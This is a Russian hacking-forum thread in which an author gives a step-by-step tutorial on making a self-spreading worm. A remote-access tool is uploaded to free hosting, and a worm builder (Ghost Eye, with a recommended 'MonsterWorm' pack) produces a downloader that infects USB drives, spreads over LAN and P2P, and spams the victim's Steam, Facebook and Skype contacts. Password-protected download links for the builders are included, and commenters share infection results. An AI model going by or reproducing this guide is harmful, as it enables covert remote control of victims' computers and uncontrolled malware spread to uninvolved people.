Загрузка...

Авторская статья Делаем вирус который распространяется сам[Сетевой/Многовекторный червь]

Тема в разделе Вирусология создана пользователем Noiselles 25 фев 2017. (поднята 25 фев 2017) 43 674 просмотра

Загрузка...
  1. Noiselles
    Noiselles Автор темы 25 фев 2017 Заблокирован(а) 235 18 фев 2017
    [IMG]
    Всем привет
    Это моя первая статья

    Сегодня поговорим о Сетевых червях и о Многовекторных червях

    Сетевой червь — разновидность самовоспроизводящихся компьютерных программ, распространяющихся в локальных и глобальных компьютерных сетях. В отличие от других типов компьютерных вирусов червь является самостоятельной программой. Черви могут использовать различные механизмы ("векторы") распространения.

    Многовекторный червьсетевой червь, применяющий для своего распространения несколько разных механизмов (векторов атаки), например, электронную почту и эксплойт ошибки в операционной системе.Черви повреждают файлы и негативно влияют на работу компьютера.


    Мы сделаем вирус который будет распространять себя сам

    1.Вирус у меня это RMS

    2.Регистрируемся на Beget https://beget.com/ru

    После регистрации вы увидите это

    Нам надо Файловый менеджер

    [IMG]
    Нажимаем ******.beget.tech
    [IMG]
    Нажимаем public_html
    [IMG]
    Нажимаем Загрузить файлы
    [IMG]
    Нажимаем Browse
    [IMG]
    Выбираем файл(вирус)---Открыть
    [IMG]
    Нажимаем Загрузка
    [IMG]
    Потом пишем в адресной стоке ваш сайт + /название_файла.exe
    Пример http://mysite.beget.tech/rms.exe
    Вам должны предложить скачать ваш файл(вирус)

    [IMG]

    Первая часть сделана
    Теперь червь
    Я пользуюсь Ghost Eye Builder
    --Заражает флешку
    --Копирует себя в папки
    --Перемещения по lan
    --p2p
    --Спамит везде где пишет жертва
    http://prnt.sc/edc2xy
    http://prnt.sc/edc31f

    Ссылка на загрузку
    https://mega.nz/#!BU9BAThL!nEN0xC1Xex4yr5F_6skmHrERwI_8geYKRWs2evVb08g
    VirusTotal
    Архив
    https://www.virustotal.com/ru/file/...ddb5f0aacb90b221c721ace3/analysis/1488030540/

    .EXE
    https://www.virustotal.com/ru/file/...9f18f8bebeea5478ee677df8/analysis/1488030629/

    Пароль: lolzteam.org


    Открываем Ghost Eye Worm.exe
    Нажимаем Browse

    [IMG]
    Выбираем Stub который лежит в папке с Ghost Eye Worm
    [IMG]
    В Direct Download Link пишем свой адрес сайт который мы делали в первом пункте + /название_файла.exe -- который вы загрузили
    Пример http://mysite.beget.tech/rms.exe
    Дальше делаем все как на скриншотах снизу

    [IMG]
    [IMG]
    [IMG]

    Нажимаем Build
    [IMG]
    Все червь готов осталось только закинуть одному человеку и все
    Червь сделает все сам)))


    Пак билдеров червей
    Рекомендую MonsterWorm

    https://mega.nz/#!JQcgjKCa!pkM5ozd-saDtxC_gCu0pTAPr-X-cxOyvKPOHMWnnF1o
    Лучше через Sanboxi или Виртуалку
    Пароль: lolzteam.org

    Пруф http://prntscr.com/edouip
    Это письма о новых зараженных пк



    С вами был Noiselles

    #моястатья
     
  2. Andrey_Elagin_inactive77016
    Andrey_Elagin_inactive77016 25 фев 2017 Заблокирован(а) 9 19 янв 2017
    И что даёт этот червь?
     
  3. Noiselles
    Noiselles Автор темы 25 фев 2017 Заблокирован(а) 235 18 фев 2017
    --Заражает флешку
    --Копирует себя в папки
    --Перемещения по lan
    --p2p
    --Спамит другим от лица заражогого в Steam FaceBook Skype


    Попробуй гораздо быстрее распространишь и все на автомате)))
     
  4. RaysMorgan
    Спамить по скайпу он точно не сможет, нужны пруфы спама по фейсбуку или стиму, если это не работает, то это обычный рмс
     
  5. Noiselles
    Noiselles Автор темы 25 фев 2017 Заблокирован(а) 235 18 фев 2017
    Даже если не сможет то
    Перемещения по лану
    p2p
    Заражения флешки
    И копирования себя в папки уже отлично

    Червь работает как downloader он может хоть winlock распространять...

    Спам по стиму и фейсбуку должен работать
     
  6. aindon1
    aindon1 25 фев 2017 86 11 фев 2017
    Припишите этой статье авторскую!
     
  7. Neon4ik
    Neon4ik 25 фев 2017 557 29 сен 2016
    Думаю стоит дать авторскую статью.
     
  8. Djo_inactive35921
    Поддерживаю
     
  9. Wizard666
    Wizard666 25 фев 2017 Заблокирован(а) 108 16 июл 2016
    Буду читать, что как и надо попробовать
     
  10. Noiselles
    Noiselles Автор темы 25 фев 2017 Заблокирован(а) 235 18 фев 2017
    Попробуй ещё другие билдеры
    Они внизу статьи
     
  11. Aquascutum_inactive87048
    Aquascutum_inactive87048 25 фев 2017 Заблокирован(а) 5 25 фев 2017
    Обычный РМС
    Проверял
     
  12. Noiselles
    Noiselles Автор темы 25 фев 2017 Заблокирован(а) 235 18 фев 2017
    Причем тут рмс
    Я на примере брал рмс
    Червь может распространять любой файл который ты зальешь на хостинг(смотри 1 этап)
     
  13. Wizard666
    Wizard666 25 фев 2017 Заблокирован(а) 108 16 июл 2016
    Теперь я понял как эти 2 брата, напиздили денег с банков на 7кк
     
  14. Wizard666
    Wizard666 25 фев 2017 Заблокирован(а) 108 16 июл 2016
    Пздц а вирусов там...
     
  15. Noiselles
    Noiselles Автор темы 25 фев 2017 Заблокирован(а) 235 18 фев 2017
    Лучше через Sanboxi
    Но у меня все норм...
     
  16. Wizard666
    Wizard666 25 фев 2017 Заблокирован(а) 108 16 июл 2016
    Дайте авторскую статью, заслужил
     
  17. Wizard666
    Wizard666 25 фев 2017 Заблокирован(а) 108 16 июл 2016
    Бля, я е себя его запустил, он теперь в вк спамит....
     
  18. Wizard666
    Wizard666 25 фев 2017 Заблокирован(а) 108 16 июл 2016
    Че делать?
     
  19. Wizard666
    Wizard666 25 фев 2017 Заблокирован(а) 108 16 июл 2016
    И диспетчер блокирнул
     
  20. Glock_inactive51047
    А есть прувы какие нибудь? Что он спамит и т.п.?
     
Top